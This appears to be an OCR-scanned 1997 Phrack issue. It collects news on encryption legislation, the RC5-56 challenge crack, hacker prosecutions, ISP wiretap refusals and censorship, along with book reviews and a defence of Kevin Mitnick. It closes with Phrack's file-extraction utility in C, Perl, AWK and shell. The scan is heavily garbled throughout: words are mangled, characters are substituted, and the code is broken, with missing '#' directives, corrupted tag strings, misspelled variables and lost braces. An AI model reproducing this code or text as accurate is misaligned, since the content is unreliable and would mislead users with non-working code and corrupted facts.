high-profile image for the prosecution. Second, through a long sentence 
for Kevin, the government hopes to encourage more guilty pleas in future 
cases against other hackers. For example, a prosecutor offering a moderate 
sentence in exchange for a guilty plea would be able to use Kevin Mitnick’s 
sentence as an example of what "could happen" if the accused decides to go 
to trial. Third, by striking fear into the hearts of the public over the 
dangers of computer hackers, the government hopes to divert scrutiny away 
from its own game-plan regarding the control and regulation of the Internet 
and other telecommunications systems. 


III. Crime of Curiosity 


The greatest injustice in the prosecution of Kevin Mitnick is revealed when 
on xamines the actual harm to society (or lack thereof) which resulted 
from Kevin’s actions. To the extent that Kevin is a "hacker" he must be 
considered a purist. The simple truth is that Kevin never sought monetary 
gain from his hacking, though it could have proven extremely profitable. 
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Nor did he hack with the malicious intent to damage or destroy other 
people’s property. Rather, Kevin pursued his hacking as a means of 
satisfying his intellectual curiosity and applying Yankee ingenuity. These 
attributes are more frequently promoted rather than punished by society. 


The ongoing case of Kevin Mitnick is gaining increased attention as the 
various issues and competing interests are played out in the arena of the 
courtroom. Exactly who Kevin Mitnick is and what he represents, however, 
is ultimately subject to personal interpretation and to the legacy which 
will be left by "The United States v. Kevin David Mitnick". 


Oxa> 


Title: SAFE crypto bill cracked again 
Source: 

Author: By Alex Lash and Dan Goodin 
Date: September 12, 1997, 8:40 a.m. PT 


For the second time in a week, a House committee has made significant 
changes to the Security and Freedom through Encryption (SAFE) Act to 
mandate that domestic encryption products give law enforcement agencies 
access to users’ messages. 


The changes by the Intelligence Committee, which were passed as a 
"substitute" to SAFE, turn the legislation on its head. The amendment 
follows similar changes two days ago in the House National Security 
Committee. 


Initially drafted as a way to loosen U.S. export controls on encryption, 
legislators have instead "marked up" the bill, or amended it at the 
committee level, to reflect the wishes of the Federal Bureau of 
Investigation and other law enforcement agencies that want "wiretap" 
access to all encrypted email and other digital files. 


Both the Intelligence and the National Security committees tend to favor 
export controls, because they view encryption as a threat to 
information-gathering activities by U.S. military and law enforcement 
officials. 


The Intelligence Committee cited those concerns today when announcing 
the substitute legislation. "Terrorist groups...drug cartels...and those 
who proliferate in deadly chemical and biological weapons are all 
formidable opponents of peace and security in the global society," said 
committee chairman Porter Goss (R-Florida) in a statement. "These bad 
actors must know that the U.S. law enforcement and national security 
agencies, working under proper oversight, will have the tools to 
frustrate illegal and deadly activity and bring international criminals 
to justice." 


Opponents of government attempts to regulate encryption, including a 
leading panel of cryptographers, have argued that built-in access to 
encrypted files would in fact threaten national and individual security 
and be prohibitively expensive to implement. 


The amended legislation calls for all imported or U.S.-made encryption 
products that are manufactured or distributed after January 31, 2000, to 
provide "immediate access" to the decrypted text if the law officials 
present a court order. "Law enforcement will specifically be required to 
obtain a separate court order to have the data, including 
communications, decrypted." 


A markup of the same bill in the House Commerce Committee was postponed 
today for two weeks. It will be the fifth such committee vote on the 
bill since its introduction. 


The Intelligence and National Security amendments this week are by no 
means a defeat of the bill. Instead, they would have to be reconciled 
with versions of the bill already approved by the House Judiciary and 
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International Relations committees. That reconciliation most likely 
would have to happen on the House floor. The rapidly fragmenting bill 
still has several layers of procedure to wend through before it reaches 
a potential floor vote, but people on both sides of the encryption 
debate openly question if the bill--in any form--will make it that far 
this year. 


The legislation has 252 cosponsors, more than half of the House 
membership. 


Oxb> 


Title: RC5 Cracked - The unknown message is... 
Source: 

Author: David McNett <nugget@slacker.com>[:] 
Date: Mon, 27 Oct 1997 08:43:38 -0500 


SS BEGIN PGP SIGNED MESSAGE----— 
Hash: SHA1 


It is a great privilege and we are excited to announce that at 13:25 
GMT on 19-Oct-1997, we found the correct solution for RSA Labs’ RC5- 
32/12/7 56-bit secret-key challenge. Confirmed by RSA Labs, the key 
0x532B744CC20999 presented us with the plaintext message for which we 
have been searching these past 250 days. 


The unknown message is: It’s time to move to a longer key length 


In undeniably the largest distributed-computing effort ever, the 
Bovine RC5 Cooperative (http://www.distributed.net/), under the 
leadership of distributed.net, managed to evaluate 47% of the 
keyspace, or 34 quadrillion keys, before finding the winning key. At 
the close of this contest our 4000 active teams were processing over 
7 billion keys each second at an aggregate computing power equivalent 
to more than 26 thousand Pentium 200’s or over 11 thousand PowerPC 
604e/200’s. Over the course of the project, we received block 
submissions from over 500 thousand unique IP addresses. 


The winning key was found by Peter Stuer <peter@dinf.vub.ac.be> with 
an Intel Pentium Pro 200 running Windows NT Workstation, working for 
the STARLab Bovine Team coordinated by Jo Hermans 
<Jo.Hermans@vub.ac.be> and centered in the Computer Science 
Department (DINF) of the Vrije Universiteit (VUB) in Brussels, 
Belgium. (http://dinf.vub.ac.be/bovine.html/). Jo’s only comments 
were that "$1000 will buy a lot of beer" and that he wished that the 
solution had been found by a Macintosh, the platform that represented 
the largest portion of his team’s cracking power. Congratulations 
Peter and Jo! 


Of the USS$10000 prize from RSA Labs, they will receive USS$1000 and 
plan to host an unforgettable party in celebration of our collective 
victory. If you’re anywhere near Brussels, you might want to find 
out when the party will be held. USS$8000, of course, is being 
donated to Project Gutenberg (http://www.promo.net/pg/) to assist 
them in their continuing efforts in converting literature into 
electronic format for the public use. The remaining USS$1000 is being 
retained by distributed.net to assist in funding future projects. 


Equally important are the thanks, accolades, and congratulations due 
to all who participated and contributed to the Bovine RC5-56 Effort! 
The thousands of teams and tens of thousands of individuals who have 
diligently tested key after key are the reason we are so successful. 


The thrill of finding the key more than compensates for the sleep, 
food, and free time that we’ve sacrificed! 


Special thanks go to all the coders and developers, especially Tim 
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Charron, who has graciously given his time and expertise since th 
earliest days of the Bovine effort. Thanks to all the coordinators 
and keyserver operators: Chris Chiapusio, Paul Chvostek, Peter 
Denitto, Peter Doubt, Mishari Muqbil, Steve Sether, and Chris 
Yarnell. Thanks to Andrew Meggs, Roderick Mann, and Kevyn Shortell 
for showing us the true power of the Macintosh and the strength of 
its users. We’d also like to thank Dave Avery for attempting to 
bridge the gap between Bovine and the other RC5 efforts. 


Once again, a heartfelt clap on the back goes out to all of us who 
have run the client. Celebrations are in order. I’d like to invite 
any and all to join us on the EFNet IRC network channel #rc5 for 
celebrations as we regroup and set our sights on the next task. Now 
that we’ve proven the limitations of a 56-bit key length, let’s go 
one further and demonstrate the power of distributed computing! We 
are, all of us, the future of computing. Join the excitement as the 
world is forced to take notice of the power we’ve harnessed. 


Moo and a good hearty laugh. 


Adam L. Beberg Client design and overall visionary 
Jeff Lawson keymaster/server network design and morale booster 
David McNett - stats development and general busybody 


Oxc> 


Title: Kashpureff in custody. 

Source: Marc Hurst <mhurst@fastlane.ca> 
Author: Marc Hurst <mhurst@fastlane.ca> 
Date: Fri, 31 Oct 1997 10:40:20 -0500 (EST) 


Eugene Kashpureff, known for his redirect of the NSI web page, 
was apprehended this morning in Toronto by undercover RCMP 
detectives. 


Pending a deportation hearing, he will be returned to New York to 
face Felony Wire Fraud charges that were sworn out against him 
after he had settled out of court with NSI in regard to their 
civil suit. 


Early in the week Eugene relinquished control of the Alternic to 
an adhoc industry group and that group will be making an 
announcement in the next few days. 


A this time I have no further information to volunteer. 


Sincerely 
Marc Hurst 


Oxd> 


Title: XS4ALL refuses Internet tap 

Source: Press Releas 

Author: Maurice Wessling 

Date: November 13th 1997, Amsterdam, Netherlands. 


XS4ALL Internet is refusing to comply with an instruction from the 
Dutch Ministry of Justice that it should tap the Internet traffic 
of one of its users as part of an investigation. XS4ALL has 
informed the Ministry that in its view the instruction lacks any 
adequate legal basis. The company’s refusal makes it liable fora 
penalty but XS4ALL is hoping for a trial case to be brought in the 
near future so that a court can make a pronouncement. 


On Friday October 31st, a detective and a computer expert from the 
Forensic Science Laboratory issued the instruction to XS4ALL. The 
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Ministry of Justice wants XS4ALL to tap for a month all Internet 
traffic to and from this user and then supply the information to 
the police. This covers e-mail, the World Wide Web, news groups, 
IRC and all Internet services that this person uses. XS4ALL would 
have to make all the technical arrangements itself. 


As far as we are aware, there is no precedent in the Netherlands 
for the Ministry of Justice issuing such a far-reaching 
instruction to an Internet provider. The detectives involved also 
acknowledge as much. Considering that a national meeting of 
Examining judges convened to discuss the instruction, one may 
appreciate just how unprecedented this situation is. Hitherto, 
instructions have mainly been confined to requests for personal 
information on the basis of an e-mail address. 


XS4ALL feels obliged in principle to protect its users and their 
privacy. Furthermore, XS4ALL has a commercial interest, since it 
must not run the risk of action being brought by users under Civil 
Law on account of unlawful deeds. This could happen with such an 
intervention by the provider which is not based in law. Finally, 
it is important from the social point of view that means of 
investigation have adequate statutory basis. To comply with the 
instruction could act as an undesirable precedent which could have 
a major impact on the privacy of all Internet users in the 
Netherlands. 


XS4ALL has no view on the nature of the investigation itself or 

he alleged crimes. It is happy to leave the court to decide that. 
or will XS4ALL make any comment on the content of the study or 

he region in which this is occurring for it is not its intention 
hat the investigation should founder. XS4ALL has proposed in vain 
o the examining judge that the instruction be recast in terms 
hich ensures the legal objections are catered for. 


=oacdcazact 


The Ministry of Justice based its claim on Article 125i of the 
Penal Code. This article was introduced in 1993 as part of the 
Computer Crime Act. It gives the examining judge the option of 
advising third parties during statutory preliminary investigations 
to provide data stored in computers in the interest of 
establishing the truth. According to legal history, it was never 
the intention to apply this provision to an instruction focused on 
the future. Legislators are still working to fill this gap in the 
arsenal of detection methods, by analogy with the Ministry of 
Justice tapping phone lines (125g of the Penal Code). The Dutch 
Constitution and the European Convention on the Protection of 
Human Rights demand a precise statutory basis for violating basic 
rights such as privacy and confidentiality of correspondence. Th 
Ministry clearly does not wish to wait for this and is now 
attempting to use Article 125i of the Penal Code, which is not 
intended for this purpose, to compel providers themselves to start 
tapping suspect users. The Ministry of Justice is taking the risk 
of the prosecution of X, in the context of which the instruction 
was issued to XS4ALL, running aground on account of using illegal 
detection methods. Here, again, XS4ALL does not wish to be liable 
in any respect in this matter. 


For information please contact: 


XS4ALL 

Maurice Wessling 
email: maurice@xs4all.nl 
http://www.xs4all.nl/ 


Oxf> 


Title: The FCC Wants V-Chip in PCs too 
Source: Cyber-Liberties Update 
Author: 


19.txt Wed Apr 26 09:43:42 2017 16 
Date: Monday, November 3, 1997 


Mandating that all new televisions have built-in censorship technology 
is not the only thing that the Federal Communications Commission (FCC) 
is seeking, said ACLU Associate Director Barry Steinhardt, it is also 
looking to require that the same technology be added to all new personal 
computers. 


Last year, culminating a protracted campaign against TV violence, 
Congress passed the Telecommunications Act of 1996, a law requiring that 
new televisions be equipped with the so-called V-chip. The V-chip is a 
computerized chip capable of detecting program ratings and blocking 
adversely rated programs from view. 


Now, the FCC has announced that it is soliciting public comments through 
November 24, on the idea of placing V-chips inside personal computers 
since some are capable of delivering television programming. 


“SAt the time the V-chip was being considered we warned that with the 
growing convergence between traditional television (broadcast and cable) 
and the Internet, it was only a matter of time before the government 
would move to require that the V-chip be placed in PC’s. Now that has 
happened,*T Steinhardt said. 


“SHardwiring censorship technology into the PC is part of the headlong 
rush to 
a scheme of rating and blocking Internet content that will turn the 
Internet into a bland homogenized medium in which only large corporate 
interest will have truly free speech,*T Steinhardt said. 


The ACLU has criticized the mandatory requirement of V-chip arguing that 
it is a form of censorship clearly forbidden by the First Amendment. 


“SAlthough its supporters claim the V-chip gives parents control over 
their 
children’s viewing habits, in fact it will function as a governmental 
usurpation of parental control,*T said Solange Bitol, Legislative Counsel 
for the ACLU’Rs Washington National Office. 


“SUnder the legislation, it is the government (either directly or by 
coercing private industry), and not the parents, that will determine how 
programs will be rated. If a parent activates the V-chip, all programs 
with a "violent" rating will be blocked. What kind of violence will be 
censored? Football games? War movies? News reports?“*T she added. 


The ACLU is opposed to mandatory addition or use of censoring 
technologies and we will be filing comments with the FCC later this 
month. We believe people are smart enough to turn off their television 
sets or PCs on their own if they don*Rt like what they see. 


Tell the FCC what you think. Submit comments to them online at 
<http://www.fcc.gov/vchip/>, and send us a copy as well so that we make 
sure your voice is heard. E-mail them to CSehgal@aclu.org. 


To subscribe to the ACLU Cyber-Liberties Update, send a message to 
majordomo@aclu.org with "subscribe Cyber-Liberties" in the body of your 
message. To terminate your subscription, send a message to 
majordomo@aclu.org with "unsubscribe Cyber-Liberties" in the body. 


1x1> 


Book Title: Underground 
Poster: George Smith via Crypt Newsletter 
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Date: 27 Aug 97 00:36:12 EDT 
From: "George Smith [CRYPTN]" <70743.1711@CompuServe.COM> 


Subject: File 5--An "Underground" Book on Australian Hackers Burns the Mind 


Source — CRYPT NEWSLETTER 44 


5 


AN "UNDERGROUND" BOOK ON AUSTRALIAN HACKERS BURNS THE MIND 


Crypt News reads so many bad books, reports and news pieces on 
hacking and the computing underground that it’s a real pleasure to 
find a writer who brings genuine perception to the subject. 
Suelette Dreyfus is such a writer, and "Underground," published by 
the Australian imprint, Mandarin, is such a book. 


The hacker stereotypes perpetrated by the mainstream media include 
descriptions which barely even fit any class of real homo sapiens 


Crypt News has met. The constant regurgitation of idiot slogans 
—-- “Information wants to be free," "Hackers are just people who 
want to find out how things work" -- insults the intelligenc 


After all, have you ever met anyone who wouldn’t want their access 
to information to be free or who didn’t admit to some curiosity 
about how the world works? No -- of course not. Dreyfus’ 
Underground" is utterly devoid of this manner of patronizing 
garbage and the reader is the better for it. 


Underground" is, however, quite a tale of human frailty. It’s 
strength comes not from the feats of hacking it portrays --and 
there are plenty of them -- but in the emotional and physical cost 
to the players. It’s painful to read about people like Anthrax, an 
A 
A 


ustralian 17-year old trapped in a dysfunctional family. 
nthrax’s father is abusive and racist, so the son --paradoxically 
—-- winds up being a little to much like him for comfort, 
delighting in victimizing complete strangers with mean jokes and 
absorbing the anti-Semitic tracts of Louis Farrakhan. For no 
discernible reason, the hacker repetitively baits an old man 
living in the United States with harassing telephone calls. 
Anthrax spends months of his time engaged in completely pointless, 
obsessed hacking of a sensitive U.S. military system. Inevitably, 
Anthrax becomes entangled in the Australian courts and his life 
collapses. 


Equally harrowing is the story of Electron whose hacking pales in 
comparison to his duel with mental illness. Crypt News challenges 
the readers of "Underground" not to squirm at the image of 
Electron, his face distorted into a fright mask of rolling eyes 
and open mouth due to tardive dyskinesia, a side-effect of being 
put on anti-schizophrenic medication. 


Dreyfus expends a great deal of effort exploring what happens when 
obsession becomes the only driving force behind her subjects’ 
hacking. In some instances, "Underground’s" characters degenerat 
into mental illness, others try to find solace in drugs. This is 
not a book in which the hackers declaim at any great length upon 
contorted philosophies in which the hacker positions himself as 
someone whose function is a betterment to society, a lubricant of 
information flow, or a noble scourge of bureaucrats and tyrants. 
Mostly, they hack because they’re good at it, it affords a measure 
of recognition and respect -- and it develops a grip upon them 
which goes beyond anything definable by words. 


Since this is the case, "Underground" won’t be popular with the 
goon squad contingent of the police corp and computer security 
industry. Dreyfus’ subjects aren’t the kind that come neatly 
packaged in the 

"throw-’ em-in-jail-for-a-few-years-—while-awaiting-trial" 
phenomenon that’s associated with America’s Kevin Mitnick-types. 
However, the state of these hackers sometimes destitute, 
unemployable or in therapy -- at the end of their travails is 
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seemingly quite sufficient punishment. 


Some things, however, never change. Apparently, much of 
Australia’s mainstream media is as dreadful at covering this type 
of story as America’s. Throughout "Underground," Dreyfus includes 
clippings from Australian newspapers featuring fabrications and 
exaggeration that bare almost no relationship to reality. Indeed, 
in one prosecution conducted within the United Kingdom, the 
tabloid press whipped the populace into a blood frenzy by 
suggesting a hacker under trial could have affected the outcome of 
the Gulf War in his trips through U.S. computers. 


Those inclined to seek the unvarnished truth will find 
"Underground" an excellent read. Before each chapter, Dreyfus 
presents a snippet of lyric chosen from the music of Midnight Oil. 
It’s an elegant touch, but I’1l suggest a lyric from another 
Australian band, a bit more obscure, to describe the spirit of 
"Underground." From Radio Birdman’s second album: "Burned my eye, 
burned my mind, I couldn’t believe it..." 

tHtttt+++ 


["Underground: Tales of Hacking, Madness and Obsession on the 
Electronic Frontier" by Suelette Dreyfus with research by Julian 
Assange, Mandarin, 475 pp.] 


Excerpts and ordering information for "Underground" can be found 
on the Web at http://www.underground-book.com 


George Smith, Ph.D., edits the Crypt Newsletter from Pasadena, 
CA. 


1x2> 


Book Title: The Electronic Privacy Papers 
: Documents on the Battle for Privacy in the Age of Surveillance 
by: Bruce Schneier + David Banisar 
publisher: John Wiley 1997 
other: 747 pages, index, USS59.99 


_The Privacy Papers_ is not about electronic privacy in general: it covers 
only United States Federal politics, and only the areas of wiretapping 
and cryptography. The three topics covered are wiretapping and the 
Digital Telephony proposals, the Clipper Chip, and other controls on 
cryptography (such as export controls and software key escrow proposals). 


he documents included fall into several categories. There are broad 
overviews of the issues, some of them written just for this volume. 
There are public pronouncements and documents from various government 
bodies: legislation, legal judgements, policy statements, and so forth. 
There are government documents obtained under Freedom of Information 
requests (some of them partially declassified documents complete with 
blacked out sections and scrawled marginal annotations), which tell 
the story of what happened behind the scenes. And there are newspaper 
editorials, opinion pieces, submissions to government enquiries, and 
policy statements from corporations and non-government organisations, 
presenting the response from the public. 


Some of the material included in _The Privacy Papers_ is available 
online, none of it is breaking news (the cut-off for material appears 
to be mid-to-late 1996), and some of the government documents included 
are rather long-winded (no surprise there). It is not intended to be a 
"current affairs" study, however; nor is it aimed at a popular audience. 
_The Privacy Papers_ will be a valuable reference sourcebook for anyone 
involved with recent government attempts to control the technology 
necessary for privacy -- for historians, activists, journalists, 
lobbyists, researchers, and maybe even politicians. 
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ST The Electronic Privacy Papers 

SS Documents on the Battle for Privacy in the Age of Surveillance 
SA Bruce Schneier 

SA David Banisar 

ol John Wiley 

SC New York 

$D 1997 

%O hardcover, bibliography, index 

SG ISBN 0-471-12297-1 

SP xvi, 747pp 

SK crime, politics, computing 

1x3> 

Book Title: "Computer Security and Privacy: An Information Sourcebook: 


Topics and Issues for the 21st Century" 


by Mark W. Greenia 

List: $29.95 

Publisher: Lexikon Services 
Win/Disk Edition 

Binding: Software 

Expected publication date: 1998 
ISBN: 0944601154 


[PWN: I haven’t seen this one in stores, and no further information or 
reviews have been found. ] 


3x1> 

CDT POLICY POST Volume 3, Number 12 August 11, 1997 

(1) CIVIL LIBERTIES GROUPS ASK FCC TO BLOCK FBI ELECTRONIC SURVEILLANCE 
PROPOSAL 

The Center for Democracy and Technology and the Electronic Frontier 


Foundation today filed a petition with the Federal Communications 
Commission to block the FBI from using the 1994 "Digital Telephony" law to 
expand government surveillance powers. 


The law, officially known as the "Communications Assistance for Law 
Enforcement Act" (CALEA), was intended to preserve law enforcement 
wiretapping ability in the face of changes in communications technologies. 
In their filing, CDT and EFF argue that the FBI has tried to use CALEA to 
e 
i 
a 


xpand its surveillance capabilities by forcing telephone companies to 
nstall intrusive and expensive surveillance features that threaten privacy 
nd violate the scope of the law. 


3x2> 
Anti-Spam Bills in Congress 
Source — ACLU Cyber-Liberties Update, Tuesday, September 2, 1997 


Unsolicited e-mail advertisement, or "spam," has few fans on the 
net. Court battles have been waged between service providers, such 
as AOL and Compuserve, and spam advertisers, including Cyber 
Promotions, over whether the thousands of messages sent to user 
e-mails can be blocked. Congress and several state legislatures 
have also stepped into the debate and have introduced some bills 
fraught with First Amendment problems because they ban commercial 
speech altogether or are content specific. 


[Laws against spam.. oh neat. So, how do they plan on enforcing it?] 
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3x3> 


El 
ve) 


JUSTICE DEPARTMENT CHARGES MICROSOFT WITH VIOLATING 1995 COURT ORD 


Asks Court to Impose $1 Million a Day Fine if Violation Continues 


WASHINGTON, D.C. The Department of Justice asked a 
federal court today to hold Microsoft Corporation--the world’s 
dominant personal computer software company--in civil contempt 
for violating terms of a 1995 court order barring it from 
imposing anticompetitive licensing terms on manufacturers of 
personal computers. 


[PWN: Hey Bill.. nah nah nah, thptptptptptptp, nanny nanny boo boo] 


3x4> 


Small Minds Think Alike 
Source - : fight-censorship@vorlon.mit.edu 


CyberWire Dispatch Bulletin 


Washington --In this boneyard of Washington, DC it doesn’t take 
long for big dawgs and small alike to bark. A couple of small 
ones yipped it up today. 


Rep. Marge (no relation to Homer) Roukema, R-N.J. and Sen. Lauch 
(??) Faircloth, R-N.C. introduced a bill to amend the 
Communications Act that would ban convicted sex offenders from 
using the Internet. 


[PWN: Oh yeah.. that will be easy to enforce. ] 


3x5> 
Cyber Promotions tossed offline 


Cyber Promotions tossed offline 
By Janet Kornblum 
September 19, 1997, 1:25 p.m. PT 


Cyber Promotions, antispammers’ enemy No. 1 on the Net, has once again 
been dumped by its access provider. 


Backbone provider AGIS cut off Cyber Promotions Wednesday, and the 
company has been scrambling for another ISP since. 


[PWN: Hey Samford... ha ha ha, nanny nanny, thptptptptp.] 


"Ping-flood attacks observed originating from the West Coast into AGIS 
and directed to the Washington and Philadelphia routers severely 
degraded AGIS network performance to [an] unacceptable level...AGIS 
had no alternative but to shut off services to Cyber Promotions," 
reads a statement that Wallace put on his page. He alleged that the 
statement came from an AGIS engineer. 


[PWN: If a ping flood took them down this time...] 
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[ Phrack Magzine Extraction Utility 


a at [ Phrack Staff 


Added to the list of extraction variants this time is a version in AWK, 
and a version in sh. Also, the C version has ben spruced up to accept 
file name globs. Keep ‘em coming... 


8< CUT-HERE >8 


<++> PEU/extract2.c 
/* extract.c by Phrack Staff and sirsyko 


* 

ae (c) Phrack Magazine, 1997 

x 1.8.98 rewritten by route: 

mS - aesthetics 

us — now accepts file globs 

a todo: 

* -— more info in tag header (file mode, checksum) 

* Extracts textfiles from a specially tagged flatfile into a hierarchical 
* directory strcuture. Use to extract source code from any of the articles 
* in Phrack Magazine (first appeared in Phrack 50). 

* 

* gcc -o extract extract.c 

* 

*  ./extract filel file2 file3 

*/ 


include <stdio.h> 
#include <stdlib.h> 
include <sys/stat.h> 
include <string.h> 
include <dirent.h> 


define BEGIN_TAG "<4+4+> " 

define END_TAG W<e-->" 

define BT_SIZE strlen (BEGIN_TAG) 
define ET_SIZE strlen (END_TAG) 


struct f_name 


u_char name[256]; 
struct f_name *next; 


}; 


int 

main(int argc, char **argv) 

{ 
u_char b[256], *bp, *fn; 
PN. 1 2 = 07 
FILE *in_p, *out_p = NULL; 
struct f_name *fn_p = NULL, *head = NULL; 


if (arge < 2) 

{ 
printf ("Usage: %s filel file2 ... filen\n", argv[0]); 
exit (0); 

} 


/* 


* Fill the f_name list with all the files on the commandline (ignoring 
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* argv[0] which is this executable). This includes globs. 
* 
ae (i = 1; (fn = argv[itt]); ) 
if (!head) 
if (! (head = (struct f_name *)malloc(sizeof (struct f_name) ))) 


{ 
perror ("malloc"); 
exit(1); 
} 
strncpy (head->name, fn, sizeof (head->name) ) ; 
head->next = NULL; 
fn_p = head; 


if (!(fn_p->next = (struct f_name *)malloc(sizeof (struct f_name) ))) 


perror ("malloc"); 
exit(l1); 
} 
fn_p = fn_p->next; 
strncpy(fn_p->name, fn, sizeof (fn_p->name) ); 
fn_p->next = NULL; 


/* 
* Sentry node. 
if 
if (!(fn_p->next = (struct f_name *)malloc(sizeof (struct f_name) ))) 


perror ("malloc"); 
exit(1); 
} 
fn_p = fn_p->next; 
fn_p->next = NULL; 


/* 
* Check each file in the f_name list for extraction tags. 
af 
for (fn_p = head; fn_p->next; fn_p = fn_p->next) 
{ 
if ('!(in_p = fopen(fn_p->name, "r"))) 
{ 
fprintf(stderr, "Could not open input file %s.\n", fn_p->name) ; 
continue; 
} 
else fprintf(stderr, "Opened %s\n", fn_p->name) ; 
while (fgets(b, 256, in_p)) 
{ 


if ('strncmp (b, BEGIN_TAG, BT_SIZE) ) 
{ 


b[strlen(b) - 1] = 0; /* Now we have a string. */ 
Itt? 


if ((bp = strchr(b + BT_SIZE + 1, '/'))) 


while (bp) 
{ 
*bp = 0; 
mkdir(b + BT_SIZE, 0700); 
*bp = PFs 
bp = strchr(bp + 1, '/’); 


} 


if ((out_p = fopen(b + BT_SIZE, "w"))) 
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printf("- Extracting s\n", b + BT_SIZI 


GJ 
~~ 
~ 


} 


else 


{ 


GJ 
~~ 
~ 


printf ("Could not extract ’%s’.\n", b + BT_SIZI 
continue; 
} 
} 
else if (!strncmp (b, END_TAG, ET_SIZE 
{ 


a) 
— 
~~ 


if (out_p) fclose(out_p); 
else 


{ 


fprintf(stderr, "Error closing file %s.\n", fn_p->name) ; 
continue; 
} 
} 
else if (out_p) 
{ 
fputs(b, out_p); 
} 
} 
} 
if (!3) printf("No extraction tags found in list.\n"); 
else printf ("Extracted %d file(s).\n", J); 
return (0); 


} 


/* EOF */ 

<--> 

<++> PEU/extract.pl 
Daos <daos@nym.alias.net> 

!/bin/sh # —*- perl -* n 

val ’exec perl $0 -S S${1+"S@"}’ if 0; 


Sopening=0; 


if (/*\<\+\+\>/) {Scurfile = substr($_, 5); Sopening=1;}; 
if (/*\<\-\-\>/) {close ct_ex; Sopened=0;}; 
if (Sopening) { 
chop Scurfile; 
Ssex_dir= substr( $curfile, 0, ((rindex($curfile,’/’))) ) if (Scurfile =~ m/\//); 
eval {mkdir $sex_dir, "0777"; }; 
open (ct_ex, ">Scurfile"); 
print "Attempting extraction of Scurfile\n"; 
Sopened=1; 


} 
if (Sopened && !Sopening) {print ct_ex S$_}; 
<--> 


<++> PEU/extract.awk 
!/usr/bin/awk -f 


Yet Another Extraction Script 
— <sirsyko> 


/*\<\t\t\>/ { 


ind = 1 

File = $2 

split ($2, dirs, "/") 
Dir=" 2 Ww 

while ( dirs[indtl1] ) { 


Dir=Dir"/"dirs [ind] 
system ("mkdir " Dir" 2>/dev/null") 
++ind 


next 
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/*\<\-\-\>/ { 

File =" 

next 


} 
File { print >> File } 
<--> 


<t++> PEU/extract.sh 
!/bin/sh 
exctract.sh : Written 9/2/1997 for the Phrack Staff by <sirsyko> 


note, this file will create all directories relative to the current directory 
originally a bug, I’ve now upgraded it to a feature since I dont want to deal 
with the leading / (besides, you dont want hackers giving you full pathnames 
anyway, now do you :) 

Hopefully this will demonstrate another useful aspect of IFS other than 
haxoring rewt 


Usage: ./extract.sh <filename> 


cat $* | ( 
Working=1 
while [ $Working ]; 
do 
OLDIFS1="SIFS" 
IFS= 
if read Line; then 
IFS="SOLDIFS1" 
set -- SLine 
case "S1" in 
"<++>") OLDIFS2="SIFS" 
IFS=/ 
set -- $2 
IFS="SOLDIFS2" 
while [ S$# -gt 1 ]; do 
File=${File:-"."}/S1 
if [ ! -d $File ]; then 
echo "Making dir $File" 
mkdir $File 


fi 

shift 
done 
File=${File:-"."}/S1 


echo "Storing data in S$File" 


"<-->") if [ "xSFile"™ != "x" J; then 
unset File 
fi 7; 
*) if [ "x$File" != "x" ]; then 
IFS= 
echo "SLine" >> SFile 
IFS="SOLDIFS1" 
fi 
rr 
esac 
IFS="SOLDIFS1" 
else 
echo "End of file" 
unset Working 
fi 
done 
) 
<--> 


